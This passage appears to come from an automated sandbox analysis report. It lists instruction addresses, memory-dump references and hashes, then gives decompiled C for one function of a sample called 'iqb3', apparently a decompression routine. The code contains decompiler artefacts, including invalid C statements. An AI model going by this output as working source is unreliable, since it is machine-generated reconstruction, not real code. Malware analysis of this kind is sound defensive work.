                                                                      0x00406452
                                                                      0x00406455
                                                                      0x0040646d
                                                                      0x00406470
                                                                      0x00406473
                                                                      0x00406476
                                                                      0x00406476
                                                                      0x00406479
                                                                      0x0040647d
                                                                      0x0040647f
                                                                      0x00406457
                                                                      0x00406457
                                                                      0x0040645f
                                                                      0x00406464
                                                                      0x00406466
                                                                      0x00406468
                                                                      0x00406468
                                                                      0x00406482
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ce
                                                                      0x004064ce
                                                                      0x004064d2
                                                                      0x00406ada
                                                                      0x00000000
                                                                      0x00406ada
                                                                      0x004064d8
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e2
                                                                      0x004064e5
                                                                      0x004064eb
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064f0
                                                                      0x004064f3
                                                                      0x004064f3
                                                                      0x004064f9
                                                                      0x00406497
                                                                      0x00406497
                                                                      0x0040649a
                                                                      0x00000000
                                                                      0x0040649a
                                                                      0x004064fb
                                                                      0x004064fb
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x00406507
                                                                      0x0040650a
                                                                      0x0040650d
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00406516
                                                                      0x00406519
                                                                      0x00406531
                                                                      0x00406534
                                                                      0x00406537
                                                                      0x0040653a
                                                                      0x0040653a
                                                                      0x0040653d
                                                                      0x00406541
                                                                      0x00406543
                                                                      0x0040651b
                                                                      0x0040651b
                                                                      0x00406523
                                                                      0x00406528
                                                                      0x0040652a
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x00406546
                                                                      0x0040654d
                                                                      0x00406550
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x004067df
                                                                      0x004067df
                                                                      0x004067e3
                                                                      0x00406b0a
                                                                      0x00000000
                                                                      0x00406b0a
                                                                      0x004067e9
                                                                      0x004067ec
                                                                      0x004067ef
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x004067fc
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x00406801
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065b2
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x004068ee
                                                                      0x004068f2
                                                                      0x00406914
                                                                      0x00406917
                                                                      0x00406921
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x004068f4
                                                                      0x004068f7
                                                                      0x004068fb
                                                                      0x004068fe
                                                                      0x004068fe
                                                                      0x00406901
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069ab
                                                                      0x004069af
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069d4
                                                                      0x004069db
                                                                      0x004069e2
                                                                      0x004069e2
                                                                      0x00000000
                                                                      0x004069e2
                                                                      0x004069b1
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069c1
                                                                      0x00406905
                                                                      0x00406905
                                                                      0x00406908
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a9c
                                                                      0x00406a9f
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066d6
                                                                      0x004066d8
                                                                      0x004066df
                                                                      0x004066e0
                                                                      0x004066e2
                                                                      0x004066e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066ed
                                                                      0x004066f0
                                                                      0x004066f3
                                                                      0x004066f5
                                                                      0x004066f7
                                                                      0x004066f7
                                                                      0x004066f8
                                                                      0x004066fb
                                                                      0x00406702
                                                                      0x00406705
                                                                      0x00406713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069f8
                                                                      0x004069f8
                                                                      0x004069fc
                                                                      0x00406b34
                                                                      0x00000000
                                                                      0x00406b34
                                                                      0x00406a02
                                                                      0x00406a05
                                                                      0x00406a08
                                                                      0x00406a0c
                                                                      0x00406a0f
                                                                      0x00406a15
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a1a
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a20
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8c
                                                                      0x00406a8d
                                                                      0x00406a8f
                                                                      0x00406a91
                                                                      0x00406a94
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x004069a6
                                                                      0x004069a0
                                                                      0x00406a26
                                                                      0x00406a2c
                                                                      0x00406a2f
                                                                      0x00406a32
                                                                      0x00406a35
                                                                      0x00406a38
                                                                      0x00406a3b
                                                                      0x00406a3e
                                                                      0x00406a41
                                                                      0x00406a44
                                                                      0x00406a47
                                                                      0x00406a60
                                                                      0x00406a63
                                                                      0x00406a66
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x00406a6f
                                                                      0x00406a6f
                                                                      0x00406a70
                                                                      0x00406a73
                                                                      0x00406a49
                                                                      0x00406a49
                                                                      0x00406a51
                                                                      0x00406a56
                                                                      0x00406a58
                                                                      0x00406a5b
                                                                      0x00406a5b
                                                                      0x00406a76
                                                                      0x00406a7d
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x0040671b
                                                                      0x0040671e
                                                                      0x00406754
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406887
                                                                      0x00406887
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406b16
                                                                      0x00000000
                                                                      0x00406b16
                                                                      0x00406892
                                                                      0x00406895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040689b
                                                                      0x0040689f
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x00000000
                                                                      0x004068a2
                                                                      0x00406720
                                                                      0x00406722
                                                                      0x00406724
                                                                      0x00406726
                                                                      0x00406729
                                                                      0x0040672a
                                                                      0x0040672c
                                                                      0x0040672e
                                                                      0x00406731
                                                                      0x00406734
                                                                      0x0040674a
                                                                      0x0040674f
                                                                      0x00406787
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x004067b7
                                                                      0x004067b9
                                                                      0x004067c0
                                                                      0x004067c3
                                                                      0x004067c6
                                                                      0x004067c6
                                                                      0x004067cb
                                                                      0x004067cb
                                                                      0x004067cd
                                                                      0x004067d0
                                                                      0x004067d7
                                                                      0x004067da
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x0040680a
                                                                      0x0040680d
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00000000
                                                                      0x00406881
                                                                      0x0040680f
                                                                      0x00406815
                                                                      0x00406818
                                                                      0x0040681b
                                                                      0x0040681e
                                                                      0x00406821
                                                                      0x00406824
                                                                      0x00406827
                                                                      0x0040682a
                                                                      0x0040682d
                                                                      0x00406830
                                                                      0x00406849
                                                                      0x0040684b
                                                                      0x0040684e
                                                                      0x0040684f
                                                                      0x00406852
                                                                      0x00406854
                                                                      0x00406857
                                                                      0x00406859
                                                                      0x0040685b
                                                                      0x0040685e
                                                                      0x00406860
                                                                      0x00406863
                                                                      0x00406867
                                                                      0x00406869
                                                                      0x00406869
                                                                      0x0040686a
                                                                      0x0040686d
                                                                      0x00406870
                                                                      0x00406832
                                                                      0x00406832
                                                                      0x0040683a
                                                                      0x0040683f
                                                                      0x00406841
                                                                      0x00406844
                                                                      0x00406844
                                                                      0x00406873
                                                                      0x0040687a
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687a
                                                                      0x0040678d
                                                                      0x00406790
                                                                      0x00406792
                                                                      0x00406795
                                                                      0x00406798
                                                                      0x0040679b
                                                                      0x0040679d
                                                                      0x004067a0
                                                                      0x004067a3
                                                                      0x004067a3
                                                                      0x004067a6
                                                                      0x004067a6
                                                                      0x004067a9
                                                                      0x004067b0
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b0
                                                                      0x00406736
                                                                      0x00406739
                                                                      0x0040673b
                                                                      0x0040673e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040649d
                                                                      0x0040649d
                                                                      0x004064a1
                                                                      0x00406ae6
                                                                      0x00000000
                                                                      0x00406ae6
                                                                      0x004064a7
                                                                      0x004064aa
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x004064b3
                                                                      0x004064b6
                                                                      0x004064b9
                                                                      0x004064bb
                                                                      0x004064be
                                                                      0x004064c1
                                                                      0x004064c4
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406628
                                                                      0x00406628
                                                                      0x0040662c
                                                                      0x00406af2
                                                                      0x00000000
                                                                      0x00406af2
                                                                      0x00406632
                                                                      0x00406635
                                                                      0x00406638
                                                                      0x0040663b
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406643
                                                                      0x00406646
                                                                      0x00406649
                                                                      0x0040664c
                                                                      0x0040664f
                                                                      0x00406650
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406655
                                                                      0x00406658
                                                                      0x0040665b
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x00406661
                                                                      0x00406663
                                                                      0x00406663
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068af
                                                                      0x004068b2
                                                                      0x004068b5
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068c0
                                                                      0x004068c3
                                                                      0x004068c6
                                                                      0x004068c9
                                                                      0x004068cc
                                                                      0x004068cd
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d5
                                                                      0x004068d8
                                                                      0x004068db
                                                                      0x004068de
                                                                      0x004068e2
                                                                      0x004068e4
                                                                      0x004068e7
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x00000000
                                                                      0x00406666
                                                                      0x004068e7
                                                                      0x00406b1c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x004069a0
                                                                      0x00406927
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x0040655b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                                      • Instruction ID: 58d989ae5c12bcd237a7596d454377c992e25c5bcc6bbfe45bc07114c875b854
                                                                      • Opcode Fuzzy Hash: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                                      • Instruction Fuzzy Hash: 867113B1E04229CBDF28CF98C844BADBBF1FB44305F15816AD816BB281D7789996DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406675 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406675() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
